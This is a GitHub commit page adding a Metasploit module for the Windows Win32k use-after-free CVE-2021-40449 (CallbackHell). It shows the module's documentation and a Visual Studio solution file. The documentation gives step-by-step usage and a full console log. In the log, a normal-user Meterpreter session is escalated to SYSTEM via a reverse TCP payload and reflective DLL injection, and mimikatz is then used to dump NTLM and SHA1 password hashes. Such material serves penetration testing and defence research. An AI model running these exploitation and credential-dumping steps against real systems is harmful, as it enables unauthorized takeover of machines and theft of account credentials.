-
Notifications
You must be signed in to change notification settings - Fork 13.9k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #15834, add CVE-2021-40449 CallbackHell Windows LPE
- Loading branch information
Showing
6 changed files
with
1,226 additions
and
0 deletions.
There are no files selected for viewing
Binary file not shown.
155 changes: 155 additions & 0 deletions
155
documentation/modules/exploit/windows/local/cve_2021_40449.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,155 @@ | ||
## Vulnerable Application | ||
|
||
A use after free vulnerability exists in the `NtGdiResetDC()` function of Win32k which can be leveraged by | ||
an attacker to escalate privileges to those of `NT AUTHORITY\SYSTEM`. The flaw exists due to the fact | ||
that this function calls `hdcOpenDCW()`, which performs a user mode callback. During this callback, attackers | ||
can call the `NtGdiResetDC()` function again with the same handle as before, which will result in the PDC object | ||
that is referenced by this handle being freed. The attacker can then replace the memory referenced by the handle | ||
with their own object, before passing execution back to the original `NtGdiResetDC()` call, which will now use the | ||
attacker's object without appropriate validation. This can then allow the attacker to manipulate the state of the | ||
kernel and, together with additional exploitation techniques, gain code execution as NT AUTHORITY\SYSTEM. | ||
|
||
This module has been tested to work on Windows 10 x64 RS1 (build 14393) and RS5 (build 17763), however | ||
previous versions of Windows 10 will likely also work. | ||
|
||
Note the exploit may occasionally not work the first time so you may have to run it again to get the results. | ||
|
||
## Options | ||
|
||
## Verification Steps | ||
|
||
1. Get a non-SYSTEM meterpreter session on Win10 RS5 x64 | ||
2. `use exploit/windows/local/cve_2021_40449` | ||
3. `set session <session>` | ||
4. `exploit` | ||
5. Get a SYSTEM session | ||
|
||
## Scenarios | ||
|
||
### Windows 10 1809 Build 17763.2114 x64 | ||
|
||
``` | ||
msf6 exploit(multi/handler) > exploit | ||
[*] Started bind TCP handler against 172.28.156.210:4444 | ||
[*] Sending stage (200262 bytes) to 172.28.156.210 | ||
[*] Meterpreter session 1 opened (172.28.145.185:36167 -> 172.28.156.210:4444 ) at 2021-11-05 15:45:08 -0500 | ||
meterpreter > getuid | ||
Server username: DESKTOP-3GHNQ93\normal | ||
meterpreter > getsystem | ||
[-] priv_elevate_getsystem: Operation failed: The system cannot find the file specified. The following was attempted: | ||
[-] Named Pipe Impersonation (In Memory/Admin) | ||
[-] Named Pipe Impersonation (Dropper/Admin) | ||
[-] Token Duplication (In Memory/Admin) | ||
[-] Named Pipe Impersonation (RPCSS variant) | ||
meterpreter > sysinfo | ||
Computer : DESKTOP-3GHNQ93 | ||
OS : Windows 10 (10.0 Build 17763). | ||
Architecture : x64 | ||
System Language : en_US | ||
Domain : WORKGROUP | ||
Logged On Users : 2 | ||
Meterpreter : x64/windows | ||
meterpreter > background | ||
[*] Backgrounding session 1... | ||
msf6 exploit(multi/handler) > use exploit/windows/local/cve_2021_40449 | ||
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp | ||
msf6 exploit(windows/local/cve_2021_40449) > show options | ||
Module options (exploit/windows/local/cve_2021_40449): | ||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
SESSION yes The session to run this module on | ||
Payload options (windows/x64/meterpreter/reverse_tcp): | ||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) | ||
LHOST 172.28.145.185 yes The listen address (an interface may be specified) | ||
LPORT 4444 yes The listen port | ||
Exploit target: | ||
Id Name | ||
-- ---- | ||
0 Windows 10 x64 RS1 (build 14393) and RS5 (build 17763) | ||
msf6 exploit(windows/local/cve_2021_40449) > set SESSION 1 | ||
SESSION => 1 | ||
msf6 exploit(windows/local/cve_2021_40449) > set LPORT 9988 | ||
LPORT => 9988 | ||
msf6 exploit(windows/local/cve_2021_40449) > exploit | ||
[!] SESSION may not be compatible with this module: | ||
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size | ||
[*] Started reverse TCP handler on 172.28.145.185:9988 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
^C[-] Exploit failed [user-interrupt]: Interrupt | ||
[-] exploit: Interrupted | ||
msf6 exploit(windows/local/cve_2021_40449) > exploit | ||
[!] SESSION may not be compatible with this module: | ||
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size | ||
[*] Started reverse TCP handler on 172.28.145.185:9988 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[*] Target's build number: 10.0.17763.2114 | ||
[+] The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected! | ||
[*] Launching msiexec to host the DLL... | ||
[+] Process 2520 launched. | ||
[*] Reflectively injecting the DLL into 2520... | ||
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete. | ||
[*] Sending stage (200262 bytes) to 172.28.156.210 | ||
[*] Meterpreter session 2 opened (172.28.145.185:9988 -> 172.28.156.210:49900 ) at 2021-11-05 15:46:21 -0500 | ||
meterpreter > getuid | ||
Server username: NT AUTHORITY\SYSTEM | ||
meterpreter > load kiwi | ||
Loading extension kiwi...c | ||
.#####. mimikatz 2.2.0 20191125 (x64/windows) | ||
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo) | ||
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) | ||
## \ / ## > http://blog.gentilkiwi.com/mimikatz | ||
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) | ||
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/ | ||
Success. | ||
meterpreter > creds_all | ||
[+] Running as SYSTEM | ||
[*] Retrieving all credentials | ||
msv credentials | ||
=============== | ||
Username Domain NTLM SHA1 | ||
-------- ------ ---- ---- | ||
normal DESKTOP-3GHNQ93 a38673ad58b19421e952fc317b62c3c4 ccff8cc980f0024dc5b3f925194a35c0fa0231c3 | ||
test DESKTOP-3GHNQ93 0cb6948805f797bf2a82807973b89537 87f8ed9157125ffc4da9e06a7b8011ad80a53fe1 | ||
wdigest credentials | ||
=================== | ||
Username Domain Password | ||
-------- ------ -------- | ||
(null) (null) (null) | ||
DESKTOP-3GHNQ93$ WORKGROUP (null) | ||
normal DESKTOP-3GHNQ93 (null) | ||
test DESKTOP-3GHNQ93 (null) | ||
kerberos credentials | ||
==================== | ||
Username Domain Password | ||
-------- ------ -------- | ||
(null) (null) (null) | ||
desktop-3ghnq93$ WORKGROUP (null) | ||
normal DESKTOP-3GHNQ93 (null) | ||
test DESKTOP-3GHNQ93 (null) | ||
meterpreter > | ||
``` |
31 changes: 31 additions & 0 deletions
31
external/source/exploits/CVE-2021-40449/CVE-2021-40449.sln
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,31 @@ | ||
|
||
Microsoft Visual Studio Solution File, Format Version 12.00 | ||
# Visual Studio Version 16 | ||
VisualStudioVersion = 16.0.31729.503 | ||
MinimumVisualStudioVersion = 10.0.40219.1 | ||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2021-40449", "CVE-2021-40449\CVE-2021-40449.vcxproj", "{AF6CB19A-2068-4490-BE5A-710F0AD5C152}" | ||
EndProject | ||
Global | ||
GlobalSection(SolutionConfigurationPlatforms) = preSolution | ||
Debug|x64 = Debug|x64 | ||
Debug|x86 = Debug|x86 | ||
Release|x64 = Release|x64 | ||
Release|x86 = Release|x86 | ||
EndGlobalSection | ||
GlobalSection(ProjectConfigurationPlatforms) = postSolution | ||
{AF6CB19A-2068-4490-BE5A-710F0AD5C152}.Debug|x64.ActiveCfg = Debug|x64 | ||
{AF6CB19A-2068-4490-BE5A-710F0AD5C152}.Debug|x64.Build.0 = Debug|x64 | ||
{AF6CB19A-2068-4490-BE5A-710F0AD5C152}.Debug|x86.ActiveCfg = Debug|Win32 | ||
{AF6CB19A-2068-4490-BE5A-710F0AD5C152}.Debug|x86.Build.0 = Debug|Win32 | ||
{AF6CB19A-2068-4490-BE5A-710F0AD5C152}.Release|x64.ActiveCfg = Release|x64 | ||
{AF6CB19A-2068-4490-BE5A-710F0AD5C152}.Release|x64.Build.0 = Release|x64 | ||
{AF6CB19A-2068-4490-BE5A-710F0AD5C152}.Release|x86.ActiveCfg = Release|Win32 | ||
{AF6CB19A-2068-4490-BE5A-710F0AD5C152}.Release|x86.Build.0 = Release|Win32 | ||
EndGlobalSection | ||
GlobalSection(SolutionProperties) = preSolution | ||
HideSolutionNode = FALSE | ||
EndGlobalSection | ||
GlobalSection(ExtensibilityGlobals) = postSolution | ||
SolutionGuid = {AF181344-04CA-4E6A-A552-ABA13E6AC54A} | ||
EndGlobalSection | ||
EndGlobal |
Oops, something went wrong.